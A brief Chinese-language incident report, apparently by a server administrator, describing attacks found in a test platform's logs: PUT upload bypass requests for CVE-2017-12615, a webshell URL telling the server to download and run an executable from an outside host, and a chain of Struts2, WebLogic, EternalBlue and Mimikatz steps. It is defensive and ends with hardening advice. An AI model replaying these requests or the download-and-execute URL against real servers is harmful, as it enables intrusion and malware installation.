攻击发现
在检查公网上的测试平台的日志时候先来自某个IP多个请求
通过PUT
的方式访问,接口
/FxCodeShell.jsp
攻击者通过扫描的方式服务运行端口上发起,4次请求
按时间顺序分别是:
GET /FxCodeShell.jsp
PUT /FxCodeShell.jsp::$DATA
PUT /FxCodeShell.jsp/
PUT /FxCodeShell.jsp%20
攻击手段
步骤 1: 用Tomcat PUT任意文件上传漏洞(CVE-2017-12615)
利用此漏洞上传名为FxCodeShell.jsp的webshell,它可以下载和执行文件:
/FxCodeShell.jsp? wiew=FxxkMyLie1836710Aa&os=1&address=http://a46.bulehero.in/download.exe&wiew=FxxkMyLie1836710Aa&o
步骤2: Struts2远程代码执行漏洞(CVE-2017-5638)
步骤3: WebLogic WLS组件远程执行代码漏洞(CVE-2017-10271)
步骤4: EternalBlue漏洞(MS-17-010)
步骤5: ipc $暴力攻击(首先使用弱密码启动暴力攻击,然后使用Mimikatz提升权限)
请各位关闭无用的端口,限制WEB服务器上的路径匹配规则,防止攻击。